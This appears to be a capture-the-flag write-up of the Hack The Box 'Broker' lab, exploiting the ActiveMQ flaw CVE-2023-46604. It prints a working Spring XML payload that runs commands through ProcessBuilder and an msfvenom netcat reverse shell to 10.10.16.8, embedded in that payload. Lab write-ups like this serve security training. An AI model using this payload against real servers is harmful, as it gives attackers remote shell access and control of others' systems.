XML

The [[Broker_CVE-2023-46604#[Exploit](https //github.com/X1r0z/ActiveMQ-RCE)|exploit package]] comes with a PoC payload; poc.xml

┌──(kali㉿kali)-[~/…/htb/labs/broker/ActiveMQ-RCE]
└─$ cat poc.xml   
<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>open</value>
                <value>-a</value>
                <value>calculator</value>
                <!-- <value>bash</value>
                <value>-c</value>
                <value>touch /tmp/success</value> -->
            </list>
            </constructor-arg>
        </bean>
    </beans>

the payload is is in the xml format that contains the java class, java.lang.processbuilder, to invoke a system call to create a operating system process. In particular, it initiates a calculator application. The commented section is ambiguous that it suggests Unix system command execution as noted by bash -c touch /tmp/success

Change

Since I don’t just intent to create a file, /tmp/success, I would need to alter the payload for gaining a foothold

msfvenom

┌──(kali㉿kali)-[~/…/htb/labs/broker/ActiveMQ-RCE]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.8 LPORT=9999
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 88 bytes
mkfifo /tmp/osaj; nc 10.10.16.8 9999 0</tmp/osaj | /bin/sh >/tmp/osaj 2>&1; rm /tmp/osaj

msfvenom generate a reverse shell payload

Complete

Since the XML payload will be interpreted by the backend Java application in the target system, I will need to change the generated reverse shell payload.

XML has strict rules about characters that can be used directly in the content of the document. Certain characters, like <, >, and &, are reserved for markup and cannot be used directly in text content. If these characters were to be included as data, XML entities can be used instead. Here are some common XML entities:

< for <
> for >
& for &
" for "
' for '

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>/bin/bash</value>
				<value>-c</value>
				<value>mkfifo /tmp/osaj; nc 10.10.16.8 9999 0&lt;/tmp/osaj | /bin/sh &gt;/tmp/osaj 2&gt;&amp;1; rm /tmp/osaj</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

Ready for deployment

InfoSec LAB

Explorer

Broker_Payload

XML

Change

msfvenom

Complete

Interactive Graph View

Table of Contents

Backlinks